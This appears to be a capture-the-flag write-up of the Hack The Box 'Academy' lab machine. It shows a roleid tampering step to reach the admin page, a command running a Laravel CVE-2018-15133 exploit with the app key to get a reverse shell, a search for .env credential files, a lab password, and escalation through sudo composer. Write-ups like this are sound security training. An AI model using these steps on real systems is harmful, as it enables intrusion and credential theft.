Academy ~ Hack The Box
Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.10.215 academy.htb" >> /etc/hosts
hosts file entry
Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -A -p- -oN initial academy.htb
┌──(root💀kali)-[/home/…/boxes/htb/machines/academy] └─# nmap -Pn -sC -sV -A -p- -oN initial academy.htb Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-10 16:54 EST Nmap scan report for academy.htb (10.10.10.215) Host is up (0.0037s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA) | 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA) |_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |http-title: Hack The Box Academy 33060/tcp open mysqlx? | fingerprint-strings: | DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: | Invalid message" | HY000
Scanning & Enumeration
Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!
When registering, I realized that I was given a roleid which was set to 0 by default.
Initial enumeration also revealed that there was an admin.php page available. Accessing the admin.php page just threw me another login page.
I wasn't able to login to the page with the account which I created using the register page.
Exploitation
The first step I took was to intercept my account registration request and change my roleid to 1. This enabled me to login to the admin page.
From this I was able to gather a bunch of information
- Possible user accounts =
cry0l1t3&mrb3n - Possible staging server =
dev-staging-01.academy.htb
The next thing I did was to add an entry in the hosts file to the newly found domain as I didn't not have a domain name server that pointed that name to the target IP
echo "10.10.10.215 dev-staging-01.academy.htb" >> /etc/hosts
hosts file entry
Heading to the newly found staging domain reveals the app that's driving the solution. I was able to find a POC exploit for this particular app with couple google searches.
┌──(root💀kali)-[/home/…/htb/machines/academy/exploit_laravel_cve-2018-15133] └─# python3 pwn_laravel.py http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0= --interactive
That got me a reverse shell into the target machine :)
Lateral Movement
I knew that the target was running Laravel. Therefore, I tried looking for crucial config files that a default Laravel install might have.
All the environment variables are declared in the .env file which includes the parameters required for initializing the configuration.
I went ahead and used the find command to help locate these config files.
find / -name "*.env"
Looking into the contents of the file revealed a set of credentials. I poked around and used these credentials on the possible user account I found earlier.
Successful Lateral Movement
I was able to successfully gain access to one of the two accounts and grab the user flag.
However, I needed to move into the other possible user that I uncovered earlier as this account didn't have any sudo privileges.
At this point I had exhausted all my manual enumeration techniques and I turned to Linpeas for assistance.
I quickly spun up a python http server, transferred Linpeas over to the target machine and ran it.
Thankfully, Linpeas was able to dig through the logs for me and point out that the potential user I found earlier was actually valid. It also returned the password for that user~
mrb3n:mrb3n_Ac@d3my!
Privilege Escalation
The privilege escalation on this last user was pretty straight forward. The user was allowed to run composer with root privileges.
Thankfully, there was an existing GTFObin for it!
ROOTY!
